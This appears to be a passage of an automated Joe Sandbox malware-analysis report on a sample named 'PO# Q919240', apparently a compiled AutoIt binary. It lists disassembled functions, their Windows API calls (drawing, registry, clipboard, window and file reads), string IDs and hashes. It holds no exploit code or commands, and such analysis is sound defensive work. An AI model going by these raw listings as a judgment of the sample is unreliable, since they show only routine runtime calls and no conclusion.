                • SetCursor.USER32(00000000), ref: 004307D3
                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                • SetCursor.USER32(00000000), ref: 004307EB
                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                • SetCursor.USER32(00000000), ref: 00430803
                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                • SetCursor.USER32(00000000), ref: 0043081B
                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                • SetCursor.USER32(00000000), ref: 00430833
                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                • SetCursor.USER32(00000000), ref: 0043084B
                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                • SetCursor.USER32(00000000), ref: 00430863
                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                • SetCursor.USER32(00000000), ref: 0043087B
                • SetCursor.USER32(00000000), ref: 00430887
                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                • SetCursor.USER32(00000000), ref: 0043089F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Cursor$Load
                • String ID:
                • API String ID: 1675784387-0
                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(0000000E), ref: 00430913
                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                • GetSysColor.USER32(00000012), ref: 00430933
                • SetTextColor.GDI32(?,?), ref: 0043093B
                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                • GetSysColor.USER32(0000000F), ref: 00430959
                • CreateSolidBrush.GDI32(?), ref: 00430962
                • GetSysColor.USER32(00000011), ref: 00430979
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                • SelectObject.GDI32(?,00000000), ref: 0043099C
                • SetBkColor.GDI32(?,?), ref: 004309A6
                • SelectObject.GDI32(?,?), ref: 004309B4
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                • DrawFocusRect.USER32(?,?), ref: 00430A91
                • GetSysColor.USER32(00000011), ref: 00430A9F
                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                • SelectObject.GDI32(?,?), ref: 00430AD0
                • DeleteObject.GDI32(00000105), ref: 00430ADC
                • SelectObject.GDI32(?,?), ref: 00430AE3
                • DeleteObject.GDI32(?), ref: 00430AE9
                • SetTextColor.GDI32(?,?), ref: 00430AF0
                • SetBkColor.GDI32(?,?), ref: 00430AFB
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1582027408-0
                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                Download Yara Rule
                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 3217815495-966354055
                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 004566AE
                • GetDesktopWindow.USER32 ref: 004566C3
                • GetWindowRect.USER32(00000000), ref: 004566CA
                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                • DestroyWindow.USER32(?), ref: 00456746
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                • IsWindowVisible.USER32(?), ref: 0045682C
                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                • GetWindowRect.USER32(?,?), ref: 00456873
                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                • CopyRect.USER32(?,?), ref: 004568BE
                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                • String ID: ($,$tooltips_class32
                • API String ID: 225202481-3320066284
                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                Download Yara Rule
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetWindowRect.USER32(?,?), ref: 00471CF7
                • GetClientRect.USER32(?,?), ref: 00471D05
                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                • GetClientRect.USER32(?,?), ref: 00471E8A
                • GetStockObject.GDI32(00000011), ref: 00471EA6
                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                • String ID: @$AutoIt v3 GUI
                • API String ID: 867697134-3359773793
                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1503153545-1459072770
                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$__wcsnicmp
                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                • API String ID: 790654849-32604322
                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                • _fseek.LIBCMT ref: 00452B3B
                • __wsplitpath.LIBCMT ref: 00452B9B
                • _wcscpy.LIBCMT ref: 00452BB0
                • _wcscat.LIBCMT ref: 00452BC5
                • __wsplitpath.LIBCMT ref: 00452BEF
                • _wcscat.LIBCMT ref: 00452C07
                • _wcscat.LIBCMT ref: 00452C1C
                • __fread_nolock.LIBCMT ref: 00452C53
                • __fread_nolock.LIBCMT ref: 00452C64
                • __fread_nolock.LIBCMT ref: 00452C83
                • __fread_nolock.LIBCMT ref: 00452C94
                • __fread_nolock.LIBCMT ref: 00452CB5
                • __fread_nolock.LIBCMT ref: 00452CC6
                • __fread_nolock.LIBCMT ref: 00452CD7
                • __fread_nolock.LIBCMT ref: 00452CE8
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452D78
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                • String ID:
                • API String ID: 2054058615-0
                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                Download Yara Rule
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window
                • String ID: 0
                • API String ID: 2353593579-4108050209
                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(0000000F), ref: 0044A05E
                • GetClientRect.USER32(?,?), ref: 0044A0D1
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                • GetWindowDC.USER32(?), ref: 0044A0F6
                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                • ReleaseDC.USER32(?,?), ref: 0044A11B
                • GetSysColor.USER32(0000000F), ref: 0044A131
                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                • GetSysColor.USER32(0000000F), ref: 0044A14F
                • GetSysColor.USER32(00000005), ref: 0044A15B
                • GetWindowDC.USER32(?), ref: 0044A1BE
                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                • GetSysColor.USER32(00000008), ref: 0044A265
                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                • GetStockObject.GDI32(00000005), ref: 0044A28A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                • String ID:
                • API String ID: 1744303182-0
                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                • __mtterm.LIBCMT ref: 00417C34
                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
